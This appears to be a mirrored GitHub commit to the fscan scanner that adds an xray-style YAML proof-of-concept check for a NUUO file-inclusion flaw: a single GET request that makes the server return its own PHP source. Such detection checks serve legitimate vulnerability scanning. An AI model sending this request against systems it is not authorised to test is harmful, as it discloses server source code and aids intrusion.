mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,10 @@
|
||||
name: poc-yaml-nuuo-file-inclusion
|
||||
rules:
|
||||
- method: GET
|
||||
path: /css_parser.php?css=css_parser.php
|
||||
follow_redirects: false
|
||||
expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']")
|
||||
detail:
|
||||
author: 2357000166(https://github.com/2357000166)
|
||||
links:
|
||||
- https://www.exploit-db.com/exploits/40211
|
||||
Reference in New Issue
Block a user